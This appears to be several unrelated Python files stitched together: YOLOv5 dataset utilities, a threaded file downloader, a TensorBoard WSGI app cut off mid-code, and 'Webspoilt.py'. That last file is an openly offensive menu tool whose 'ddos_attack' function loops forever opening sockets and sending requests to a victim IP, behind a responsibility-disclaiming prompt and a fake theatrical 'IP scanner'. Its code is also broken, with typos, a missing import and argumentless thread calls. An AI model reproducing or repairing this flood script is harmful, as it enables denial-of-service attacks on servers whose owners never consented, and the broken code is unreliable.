labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = (int(random.uniform(0, s)) for _ in self.mosaic_border) # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
@staticmethod
def collate_fn(batch):
im, label, path, shapes = zip(*batch) # transposed
for i, lb in enumerate(label):
lb[:, 0] = i # add target image index for build_targets()
return torch.stack(im, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
im4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0.0, 0, 0, 1, 0, 0]])
wo = torch.tensor([[0.0, 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, 0.5, 0.5, 0.5, 0.5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2.0, mode='bilinear', align_corners=False)[
0].type(img[i].type())
lb = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
lb = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
im4.append(im)
label4.append(lb)
for i, lb in enumerate(label4):
lb[:, 0] = i # add target image index for build_targets()
return torch.stack(im4, 0), torch.cat(label4, 0), path4, shapes4
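# Illustrative usage sketch (not part of the original file): how this dataset class is
# typically wired into a torch DataLoader together with its static collate_fn. The dataset
# path and batch size below are hypothetical placeholders; constructor defaults are assumed.
#
# from torch.utils.data import DataLoader
# dataset = LoadImagesAndLabels('../datasets/coco128/images/train2017')
# loader = DataLoader(dataset, batch_size=16, shuffle=True,
#                     collate_fn=LoadImagesAndLabels.collate_fn)
# for imgs, targets, paths, shapes in loader:
#     # imgs: uint8 tensor of shape (B, 3, H, W), RGB channel order
#     # targets: float tensor of shape (N, 6) = (image index in batch, class, x, y, w, h), normalized
#     break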
# Ancillary functions --------------------------------------------------------------------------------------------------
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path=DATASETS_DIR / 'coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(str(path) + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path=DATASETS_DIR / 'coco128'): # from utils.datasets import *; extract_boxes()
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in IMG_FORMATS:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file) as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
                    b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path=DATASETS_DIR / 'coco128/images', weights=(0.9, 0.1, 0.0), annotated_only=False):
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit()
Arguments
path: Path to images directory
weights: Train, val, test weights (list, tuple)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sorted(x for x in path.rglob('*.*') if x.suffix[1:].lower() in IMG_FORMATS) # image files only
n = len(files) # number of files
random.seed(0) # for reproducibility
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path.parent / x).unlink(missing_ok=True) for x in txt] # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0]).exists(): # check label
with open(path.parent / txt[i], 'a') as f:
f.write('./' + img.relative_to(path.parent).as_posix() + '\n') # add image to txt file
def verify_image_label(args):
# Verify one image-label pair
im_file, lb_file, prefix = args
nm, nf, ne, nc, msg, segments = 0, 0, 0, 0, '', [] # number (missing, found, empty, corrupt), message, segments
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in IMG_FORMATS, f'invalid image format {im.format}'
if im.format.lower() in ('jpg', 'jpeg'):
with open(im_file, 'rb') as f:
f.seek(-2, 2)
if f.read() != b'\xff\xd9': # corrupt JPEG
ImageOps.exif_transpose(Image.open(im_file)).save(im_file, 'JPEG', subsampling=0, quality=100)
msg = f'{prefix}WARNING: {im_file}: corrupt JPEG restored and saved'
# verify labels
if os.path.isfile(lb_file):
nf = 1 # label found
with open(lb_file) as f:
lb = [x.split() for x in f.read().strip().splitlines() if len(x)]
if any(len(x) > 6 for x in lb): # is segment
classes = np.array([x[0] for x in lb], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in lb] # (cls, xy1...)
lb = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
lb = np.array(lb, dtype=np.float32)
nl = len(lb)
if nl:
assert lb.shape[1] == 5, f'labels require 5 columns, {lb.shape[1]} columns detected'
assert (lb >= 0).all(), f'negative label values {lb[lb < 0]}'
assert (lb[:, 1:] <= 1).all(), f'non-normalized or out of bounds coordinates {lb[:, 1:][lb[:, 1:] > 1]}'
_, i = np.unique(lb, axis=0, return_index=True)
if len(i) < nl: # duplicate row check
lb = lb[i] # remove duplicates
if segments:
                        segments = [segments[x] for x in i]  # keep segments matching the de-duplicated labels
msg = f'{prefix}WARNING: {im_file}: {nl - len(i)} duplicate labels removed'
else:
ne = 1 # label empty
lb = np.zeros((0, 5), dtype=np.float32)
else:
nm = 1 # label missing
lb = np.zeros((0, 5), dtype=np.float32)
return im_file, lb, shape, segments, nm, nf, ne, nc, msg
except Exception as e:
nc = 1
msg = f'{prefix}WARNING: {im_file}: ignoring corrupt image/label: {e}'
return [None, None, None, None, nm, nf, ne, nc, msg]
def dataset_stats(path='coco128.yaml', autodownload=False, verbose=False, profile=False, hub=False):
""" Return dataset statistics dictionary with images and instances counts per split per class
To run in parent directory: export PYTHONPATH="$PWD/yolov5"
Usage1: from utils.datasets import *; dataset_stats('coco128.yaml', autodownload=True)
Usage2: from utils.datasets import *; dataset_stats('path/to/coco128_with_yaml.zip')
Arguments
path: Path to data.yaml or data.zip (with data.yaml inside data.zip)
autodownload: Attempt to download dataset if not found locally
        verbose: Print stats dictionary
        profile: Profile the time taken to save and reload the stats file
        hub: Additionally save resized, reduced-quality copies of the images for web/app viewing
    """
def round_labels(labels):
        # Update labels to integer class and 4 decimal place floats
return [[int(c), *(round(x, 4) for x in points)] for c, *points in labels]
def unzip(path):
# Unzip data.zip TODO: CONSTRAINT: path/to/abc.zip MUST unzip to 'path/to/abc/'
if str(path).endswith('.zip'): # path is data.zip
assert Path(path).is_file(), f'Error unzipping {path}, file not found'
ZipFile(path).extractall(path=path.parent) # unzip
dir = path.with_suffix('') # dataset directory == zip name
return True, str(dir), next(dir.rglob('*.yaml')) # zipped, data_dir, yaml_path
else: # path is data.yaml
return False, None, path
def hub_ops(f, max_dim=1920):
# HUB ops for 1 image 'f': resize and save at reduced quality in /dataset-hub for web/app viewing
f_new = im_dir / Path(f).name # dataset-hub image filename
try: # use PIL
im = Image.open(f)
r = max_dim / max(im.height, im.width) # ratio
if r < 1.0: # image too large
im = im.resize((int(im.width * r), int(im.height * r)))
im.save(f_new, 'JPEG', quality=75, optimize=True) # save
except Exception as e: # use OpenCV
print(f'WARNING: HUB ops PIL failure {f}: {e}')
im = cv2.imread(f)
im_height, im_width = im.shape[:2]
r = max_dim / max(im_height, im_width) # ratio
if r < 1.0: # image too large
im = cv2.resize(im, (int(im_width * r), int(im_height * r)), interpolation=cv2.INTER_AREA)
cv2.imwrite(str(f_new), im)
zipped, data_dir, yaml_path = unzip(Path(path))
with open(check_yaml(yaml_path), errors='ignore') as f:
data = yaml.safe_load(f) # data dict
if zipped:
data['path'] = data_dir # TODO: should this be dir.resolve()?
check_dataset(data, autodownload) # download dataset if missing
hub_dir = Path(data['path'] + ('-hub' if hub else ''))
stats = {'nc': data['nc'], 'names': data['names']} # statistics dictionary
for split in 'train', 'val', 'test':
if data.get(split) is None:
stats[split] = None # i.e. no test set
continue
x = []
dataset = LoadImagesAndLabels(data[split]) # load dataset
for label in tqdm(dataset.labels, total=dataset.n, desc='Statistics'):
x.append(np.bincount(label[:, 0].astype(int), minlength=data['nc']))
x = np.array(x) # shape(128x80)
stats[split] = {'instance_stats': {'total': int(x.sum()), 'per_class': x.sum(0).tolist()},
'image_stats': {'total': dataset.n, 'unlabelled': int(np.all(x == 0, 1).sum()),
'per_class': (x > 0).sum(0).tolist()},
'labels': [{str(Path(k).name): round_labels(v.tolist())} for k, v in
zip(dataset.im_files, dataset.labels)]}
if hub:
im_dir = hub_dir / 'images'
im_dir.mkdir(parents=True, exist_ok=True)
for _ in tqdm(ThreadPool(NUM_THREADS).imap(hub_ops, dataset.im_files), total=dataset.n, desc='HUB Ops'):
pass
# Profile
stats_path = hub_dir / 'stats.json'
if profile:
for _ in range(1):
file = stats_path.with_suffix('.npy')
t1 = time.time()
np.save(file, stats)
t2 = time.time()
x = np.load(file, allow_pickle=True)
print(f'stats.npy times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
file = stats_path.with_suffix('.json')
t1 = time.time()
with open(file, 'w') as f:
json.dump(stats, f) # save stats *.json
t2 = time.time()
with open(file) as f:
x = json.load(f) # load hyps dict
print(f'stats.json times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
# Save, print and return
if hub:
print(f'Saving {stats_path.resolve()}...')
with open(stats_path, 'w') as f:
json.dump(stats, f) # save stats.json
if verbose:
print(json.dumps(stats, indent=2, sort_keys=False))
return stats
|
ThreadFileDownloader.py
|
import io
import threading
import urllib.request
from pathlib import Path
from typing import Union
class ThreadFileDownloader:
"""
    File downloader that runs in a background thread.
    url : str
    savepath : str or Path, optional (default None)
    Use .get_error() to check for errors.
"""
def __init__(self, url, savepath : Union[str, Path] = None):
if savepath is not None:
savepath = Path(savepath)
self._partpath = savepath.parent / ( savepath.name + '.part' )
else:
self._partpath = None
self._savepath = savepath
self._url = url
self._error = None
self._file_size = None
self._file_size_dl = None
self._bytes = None
threading.Thread(target=self._thread, daemon=True).start()
def get_progress(self) -> float:
"""
        return progress of downloading as a [0.0...100.0] value,
        where 100.0 means the download is complete
"""
if self._file_size is None or self._file_size_dl is None:
return 0.0
return (self._file_size_dl / self._file_size) * 100.0
def get_bytes(self) -> bytes:
"""
        returns the bytes of the downloaded file if savepath is not defined
"""
return self._bytes
def get_error(self) -> Union[str, None]:
"""
returns error string or None if no error
"""
return self._error
def _thread(self):
try:
url_req = urllib.request.urlopen(self._url)
file_size = self._file_size = int( url_req.getheader('content-length') )
self._file_size_dl = 0
savepath = self._savepath
partpath = self._partpath
if partpath is not None:
if partpath.exists():
partpath.unlink()
f = open(partpath, 'wb')
else:
f = io.BytesIO()
while url_req is not None:
buffer = url_req.read(8192)
if not buffer:
break
f.write(buffer)
new_file_size_dl = self._file_size_dl + len(buffer)
if new_file_size_dl >= file_size:
if partpath is not None:
f.close()
if savepath.exists():
savepath.unlink()
partpath.rename(savepath)
else:
self._bytes = f.getvalue()
f.close()
url_req.close()
url_req = None
self._file_size_dl = new_file_size_dl
except Exception as e:
self._error = str(e)
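# Illustrative usage sketch (not part of the original class): a simple polling loop showing
# how get_progress() and get_error() are intended to be used while the background thread
# downloads. The URL and save path are hypothetical.
#
# if __name__ == '__main__':
#     import time
#     dl = ThreadFileDownloader('https://example.com/file.bin', savepath='file.bin')
#     while dl.get_progress() < 100.0 and dl.get_error() is None:
#         print(f'progress: {dl.get_progress():.1f}%')
#         time.sleep(0.5)
#     if dl.get_error() is not None:
#         print('download failed:', dl.get_error())
#     else:
#         print('done')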
|
Webspoilt.py
|
#author : Sayyed Viquar Ahmed (DeadSHot0x7)
from tqdm import tqdm
import time
import pyfiglet
import os
import socket
import urllib.request
import logging
for i in tqdm (range (101),
desc="Loading…",
ascii=False, ncols=75):
time.sleep(0.01)
print("Complete.")
os.system("cls")
def ipscanner(ip):
    ip_add = socket.gethostbyname(ip)
    for i in range(10, 100, 10):
        time.sleep(2)
        print("Loading", i, "%")
    print(" \t [*] Successfully connected with the server!")
    for j in range(0, 5):
        time.sleep(2)
        print("[*] Now scanning for the IP address")
    print("[*] IP address found!")
    time.sleep(5)
    for k in range(0, 4):
        time.sleep(5)
        print("[*] Decoding")
    print("\t [*] IP ADDRESS OF THE WEBSITE: \t ", ip_add)
def ddos_attack(a,j,s,i):
print("[*] Started Thread's")
time.sleep(5)
print("[*] Initalized Thread")
time .sleep(5)
target_ip=a
port=j
ip_address=s
k=i
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s.connect((target_ip,port))
s.sendto(("GET /" + target_ip + "HTTP/1.1\r\n").encode(ascii), (target_ip,port))
s.sendyo(("Host : " + ip_address + "\r\n\r\n").encode(ascii), (target_ip , port))
for i in range (k):
thread=threading.Thread(target=ddos_attack)
thread.start();
time.sleep(5)
print(" DDOS ATTACK SUCEESFULL ON ",target_ip,"Address");
if __name__ == "__main__":
while(1):
try:
banner=pyfiglet.figlet_format("Webspoilt", font="slant")
print(banner)
print("\t Script by DeadShot0x7")
print("\n")
print("DeadShot0x7 will not responsible for the loss you have done or made ")
dec=str(input("y or n"))
if dec == "y" or dec == "Yes" or dec == "yes":
logging.basicConfig(format='%(asctime)s - %(message)s', level=logging.INFO)
print("Yes I'm Responsible for the loss I've made.")
else :
time.sleep(1)
break
print("\n")
print("1.Scann Ip Address 2.DDoS a Website")
print("3.Brtueforce 4.Port Scanner")
print("5.Update 6.Exit")
ans=int(input("Select your option\t"))
if ans == 1:
sitename=str(input("Enter The Website name \t"))
time.sleep(5)
ipscanner(sitename)
if ans == 2:
target_ip=str(input("Enter Victim's Ip address "));
                port=int(input("Enter the Port number, Default Port Number (3333) "));
ip_address=str(input("Enter your Ip address "));
bot=str(input("Enter Number Thread you want to send"));
ddos_attack(target_ip,port,ip_address,bot);
if ans == 3 :
print("\n \n ")
print("\t This Feature is comming Soons")
print("\n \n")
if ans == 4 :
print("CLosing the application ")
break
if ans ==5:
try:
os.system("git pull")
except Exception as e :
print("Can't update the script please check your internet Connection")
if ans == 6:
time.sleep("1")
break
        except Exception:
            print("Can't open the application due to some error")
|
application.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorBoard WSGI Application Logic.
Provides TensorBoardWSGIApp for building a TensorBoard WSGI app.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import base64
import collections
import contextlib
import hashlib
import json
import os
import re
import shutil
import tempfile
import textwrap
import threading
import time
import six
from six.moves.urllib import (
parse as urlparse,
) # pylint: disable=wrong-import-order
from werkzeug import wrappers
from tensorboard import errors
from tensorboard import plugin_util
from tensorboard.backend import empty_path_redirect
from tensorboard.backend import experiment_id
from tensorboard.backend import experimental_plugin
from tensorboard.backend import http_util
from tensorboard.backend import path_prefix
from tensorboard.backend import security_validator
from tensorboard.backend.event_processing import (
data_provider as event_data_provider,
)
from tensorboard.backend.event_processing import (
plugin_event_accumulator as event_accumulator,
)
from tensorboard.backend.event_processing import (
plugin_event_multiplexer as event_multiplexer,
)
from tensorboard.plugins import base_plugin
from tensorboard.plugins.audio import metadata as audio_metadata
from tensorboard.plugins.core import core_plugin
from tensorboard.plugins.histogram import metadata as histogram_metadata
from tensorboard.plugins.image import metadata as image_metadata
from tensorboard.plugins.pr_curve import metadata as pr_curve_metadata
from tensorboard.plugins.scalar import metadata as scalar_metadata
from tensorboard.util import tb_logging
DEFAULT_SIZE_GUIDANCE = {
event_accumulator.TENSORS: 10,
}
# TODO(@wchargin): Once SQL mode is in play, replace this with an
# alternative that does not privilege first-party plugins.
DEFAULT_TENSOR_SIZE_GUIDANCE = {
scalar_metadata.PLUGIN_NAME: 1000,
image_metadata.PLUGIN_NAME: 10,
audio_metadata.PLUGIN_NAME: 10,
histogram_metadata.PLUGIN_NAME: 500,
pr_curve_metadata.PLUGIN_NAME: 100,
}
DATA_PREFIX = "/data"
PLUGIN_PREFIX = "/plugin"
PLUGINS_LISTING_ROUTE = "/plugins_listing"
PLUGIN_ENTRY_ROUTE = "/plugin_entry.html"
EXPERIMENTAL_PLUGINS_QUERY_PARAM = "experimentalPlugin"
# Slashes in a plugin name could throw the router for a loop. An empty
# name would be confusing, too. To be safe, let's restrict the valid
# names as follows.
_VALID_PLUGIN_RE = re.compile(r"^[A-Za-z0-9_-]+$")
logger = tb_logging.get_logger()
def _parse_samples_per_plugin(flags):
result = {}
if not flags or not flags.samples_per_plugin:
return result
for token in flags.samples_per_plugin.split(","):
k, v = token.strip().split("=")
result[k] = int(v)
return result
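# Worked example (illustrative only): a --samples_per_plugin flag value such as
# "scalars=500,images=0" parses to {"scalars": 500, "images": 0}; these per-plugin
# hints are then layered over DEFAULT_TENSOR_SIZE_GUIDANCE by _apply_tensor_size_guidance.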
def _apply_tensor_size_guidance(sampling_hints):
"""Apply user per-summary size guidance overrides."""
tensor_size_guidance = dict(DEFAULT_TENSOR_SIZE_GUIDANCE)
tensor_size_guidance.update(sampling_hints)
return tensor_size_guidance
def standard_tensorboard_wsgi(flags, plugin_loaders, assets_zip_provider):
"""Construct a TensorBoardWSGIApp with standard plugins and multiplexer.
Args:
flags: An argparse.Namespace containing TensorBoard CLI flags.
plugin_loaders: A list of TBLoader instances.
assets_zip_provider: See TBContext documentation for more information.
Returns:
The new TensorBoard WSGI application.
:type plugin_loaders: list[base_plugin.TBLoader]
:rtype: TensorBoardWSGI
"""
data_provider = None
multiplexer = None
reload_interval = flags.reload_interval
# Regular logdir loading mode.
sampling_hints = _parse_samples_per_plugin(flags)
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=DEFAULT_SIZE_GUIDANCE,
tensor_size_guidance=_apply_tensor_size_guidance(sampling_hints),
purge_orphaned_data=flags.purge_orphaned_data,
max_reload_threads=flags.max_reload_threads,
event_file_active_filter=_get_event_file_active_filter(flags),
)
data_provider = event_data_provider.MultiplexerDataProvider(
multiplexer, flags.logdir or flags.logdir_spec
)
if reload_interval >= 0:
# We either reload the multiplexer once when TensorBoard starts up, or we
# continuously reload the multiplexer.
if flags.logdir:
path_to_run = {os.path.expanduser(flags.logdir): None}
else:
path_to_run = parse_event_files_spec(flags.logdir_spec)
start_reloading_multiplexer(
multiplexer, path_to_run, reload_interval, flags.reload_task
)
return TensorBoardWSGIApp(
flags, plugin_loaders, data_provider, assets_zip_provider, multiplexer
)
def _handling_errors(wsgi_app):
def wrapper(*args):
(environ, start_response) = (args[-2], args[-1])
try:
return wsgi_app(*args)
except errors.PublicError as e:
request = wrappers.Request(environ)
error_app = http_util.Respond(
request, str(e), "text/plain", code=e.http_code
)
return error_app(environ, start_response)
# Let other exceptions be handled by the server, as an opaque
# internal server error.
return wrapper
def TensorBoardWSGIApp(
flags,
plugins,
data_provider=None,
assets_zip_provider=None,
deprecated_multiplexer=None,
):
"""Constructs a TensorBoard WSGI app from plugins and data providers.
Args:
flags: An argparse.Namespace containing TensorBoard CLI flags.
plugins: A list of plugin loader instances.
assets_zip_provider: See TBContext documentation for more information.
data_provider: Instance of `tensorboard.data.provider.DataProvider`. May
be `None` if `flags.generic_data` is set to `"false"` in which case
`deprecated_multiplexer` must be passed instead.
deprecated_multiplexer: Optional `plugin_event_multiplexer.EventMultiplexer`
to use for any plugins not yet enabled for the DataProvider API.
Required if the data_provider argument is not passed.
Returns:
A WSGI application that implements the TensorBoard backend.
:type plugins: list[base_plugin.TBLoader]
"""
plugin_name_to_instance = {}
context = base_plugin.TBContext(
data_provider=data_provider,
flags=flags,
logdir=flags.logdir,
multiplexer=deprecated_multiplexer,
assets_zip_provider=assets_zip_provider,
plugin_name_to_instance=plugin_name_to_instance,
sampling_hints=_parse_samples_per_plugin(flags),
window_title=flags.window_title,
)
tbplugins = []
experimental_plugins = []
for plugin_spec in plugins:
loader = make_plugin_loader(plugin_spec)
try:
plugin = loader.load(context)
except Exception:
logger.error(
"Failed to load plugin %s; ignoring it.",
getattr(loader.load, "__qualname__", loader.load),
exc_info=True,
)
plugin = None
if plugin is None:
continue
tbplugins.append(plugin)
if isinstance(
loader, experimental_plugin.ExperimentalPlugin
) or isinstance(plugin, experimental_plugin.ExperimentalPlugin):
experimental_plugins.append(plugin.plugin_name)
plugin_name_to_instance[plugin.plugin_name] = plugin
return TensorBoardWSGI(
tbplugins, flags.path_prefix, data_provider, experimental_plugins
)
class TensorBoardWSGI(object):
"""The TensorBoard WSGI app that delegates to a set of TBPlugin."""
def __init__(
self,
plugins,
path_prefix="",
data_provider=None,
experimental_plugins=None,
):
"""Constructs TensorBoardWSGI instance.
Args:
plugins: A list of base_plugin.TBPlugin subclass instances.
          path_prefix: A prefix of the URL path, for when the app is not served
            from the root; may be the empty string.
data_provider: `tensorboard.data.provider.DataProvider` or
`None`; if present, will inform the "active" state of
`/plugins_listing`.
experimental_plugins: A list of plugin names that are only provided
experimentally. The corresponding plugins will only be activated for
a user if the user has specified the plugin with the experimentalPlugin
query parameter in the URL.
Returns:
A WSGI application for the set of all TBPlugin instances.
Raises:
ValueError: If some plugin has no plugin_name
ValueError: If some plugin has an invalid plugin_name (plugin
            names must only contain [A-Za-z0-9_-])
ValueError: If two plugins have the same plugin_name
ValueError: If some plugin handles a route that does not start
with a slash
:type plugins: list[base_plugin.TBPlugin]
"""
self._plugins = plugins
self._path_prefix = path_prefix
self._data_provider = data_provider
self._experimental_plugins = frozenset(experimental_plugins or ())
if self._path_prefix.endswith("/"):
# Should have been fixed by `fix_flags`.
raise ValueError(
"Trailing slash in path prefix: %r" % self._path_prefix
)
self.exact_routes = {
# TODO(@chihuahua): Delete this RPC once we have skylark rules that
# obviate the need for the frontend to determine which plugins are
# active.
DATA_PREFIX + PLUGINS_LISTING_ROUTE: self._serve_plugins_listing,
DATA_PREFIX + PLUGIN_ENTRY_ROUTE: self._serve_plugin_entry,
}
unordered_prefix_routes = {}
# Serve the routes from the registered plugins using their name as the route
# prefix. For example if plugin z has two routes /a and /b, they will be
# served as /data/plugin/z/a and /data/plugin/z/b.
plugin_names_encountered = set()
for plugin in self._plugins:
if plugin.plugin_name is None:
raise ValueError("Plugin %s has no plugin_name" % plugin)
if not _VALID_PLUGIN_RE.match(plugin.plugin_name):
raise ValueError(
"Plugin %s has invalid name %r"
% (plugin, plugin.plugin_name)
)
if plugin.plugin_name in plugin_names_encountered:
raise ValueError(
"Duplicate plugins for name %s" % plugin.plugin_name
)
plugin_names_encountered.add(plugin.plugin_name)
try:
plugin_apps = plugin.get_plugin_apps()
except Exception as e: # pylint: disable=broad-except
if (
type(plugin) is core_plugin.CorePlugin
): # pylint: disable=unidiomatic-typecheck
raise
logger.warn(
"Plugin %s failed. Exception: %s",
plugin.plugin_name,
str(e),
)
continue
for route, app in plugin_apps.items():
if not route.startswith("/"):
raise ValueError(
"Plugin named %r handles invalid route %r: "
"route does not start with a slash"
% (plugin.plugin_name, route)
)
if (
type(plugin) is core_plugin.CorePlugin
): # pylint: disable=unidiomatic-typecheck
path = route
else:
path = (
DATA_PREFIX
+ PLUGIN_PREFIX
+ "/"
+ plugin.plugin_name
+ route
)
if path.endswith("/*"):
# Note we remove the '*' but leave the slash in place.
path = path[:-1]
if "*" in path:
# note we re-add the removed * in the format string
raise ValueError(
"Plugin %r handles invalid route '%s*': Only "
"trailing wildcards are supported "
"(i.e., `/.../*`)" % (plugin.plugin_name, path)
)
unordered_prefix_routes[path] = app
else:
if "*" in path:
raise ValueError(
"Plugin %r handles invalid route %r: Only "
"trailing wildcards are supported "
"(i.e., `/.../*`)" % (plugin.plugin_name, path)
)
self.exact_routes[path] = app
# Wildcard routes will be checked in the given order, so we sort them
# longest to shortest so that a more specific route will take precedence
# over a more general one (e.g., a catchall route `/*` should come last).
self.prefix_routes = collections.OrderedDict(
sorted(
six.iteritems(unordered_prefix_routes),
key=lambda x: len(x[0]),
reverse=True,
)
)
self._app = self._create_wsgi_app()
def _create_wsgi_app(self):
"""Apply middleware to create the final WSGI app."""
app = self._route_request
app = empty_path_redirect.EmptyPathRedirectMiddleware(app)
app = experiment_id.ExperimentIdMiddleware(app)
app = path_prefix.PathPrefixMiddleware(app, self._path_prefix)
app = security_validator.SecurityValidatorMiddleware(app)
app = _handling_errors(app)
return app
@wrappers.Request.application
def _serve_plugin_entry(self, request):
"""Serves a HTML for iframed plugin entry point.
Args:
request: The werkzeug.Request object.
Returns:
A werkzeug.Response object.
"""
name = request.args.get("name")
plugins = [
plugin for plugin in self._plugins if plugin.plugin_name == name
]
if not plugins:
raise errors.NotFoundError(name)
if len(plugins) > 1:
            # Technically this is not possible, as plugin names are unique and
            # uniqueness is checked in __init__.
reason = (
"Plugin invariant error: multiple plugins with name "
"{name} found: {list}"
).format(name=name, list=plugins)
raise AssertionError(reason)
plugin = plugins[0]
module_path = plugin.frontend_metadata().es_module_path
if not module_path:
return http_util.Respond(
request, "Plugin is not module loadable", "text/plain", code=400
)
        # A non-self origin is blocked by CSP, but this is a good invariant check.
if urlparse.urlparse(module_path).netloc:
raise ValueError("Expected es_module_path to be non-absolute path")
module_json = json.dumps("." + module_path)
script_content = "import({}).then((m) => void m.render());".format(
module_json
)
digest = hashlib.sha256(script_content.encode("utf-8")).digest()
script_sha = base64.b64encode(digest).decode("ascii")
html = textwrap.dedent(
"""
<!DOCTYPE html>
<head><base href="plugin/{name}/" /></head>
<body><script type="module">{script_content}</script></body>
"""
).format(name=name, script_content=script_content)
return http_util.Respond(
request, html, "text/html", csp_scripts_sha256s=[script_sha],
)
@wrappers.Request.application
def _serve_plugins_listing(self, request):
"""Serves an object mapping plugin name to whether it is enabled.
Args:
request: The werkzeug.Request object.
Returns:
A werkzeug.Response object.
"""
response = collections.OrderedDict()
eid = plugin_util.experiment_id(request.environ)
plugins_with_data = frozenset(
self._data_provider.list_plugins(eid) or frozenset()
if self._data_provider is not None
else frozenset()
)
plugins_to_skip = self._experimental_plugins - frozenset(
request.args.getlist(EXPERIMENTAL_PLUGINS_QUERY_PARAM)
)
for plugin in self._plugins:
if plugin.plugin_name in plugins_to_skip:
continue
if (
type(plugin) is core_plugin.CorePlugin
): # pylint: disable=unidiomatic-typecheck
# This plugin's existence is a backend implementation detail.
continue
is_active = bool(
frozenset(plugin.data_plugin_names()) & plugins_with_data
)
if not is_active:
try:
start = time.time()
is_active = plugin.is_active()
elapsed = time.time() - start
logger.info(
"Plugin listing: is_active() for %s took %0.3f seconds",
plugin.plugin_name,
elapsed,
)
except Exception:
is_active = False
logger.error(
"Plugin listing: is_active() for %s failed (marking inactive)",
plugin.plugin_name,
exc_info=True,
)
plugin_metadata = plugin.frontend_metadata()
output_metadata = {
"disable_reload": plugin_metadata.disable_reload,
"enabled": is_active,
# loading_mechanism set below
"remove_dom": plugin_metadata.remove_dom,
# tab_name set below
}
if plugin_metadata.tab_name is not None:
output_metadata["tab_name"] = plugin_metadata.tab_name
else:
output_metadata["tab_name"] = plugin.plugin_name
es_module_handler = plugin_metadata.es_module_path
element_name = plugin_metadata.element_name
is_ng_component = plugin_metadata.is_ng_component
if is_ng_component:
if element_name is not None:
raise ValueError(
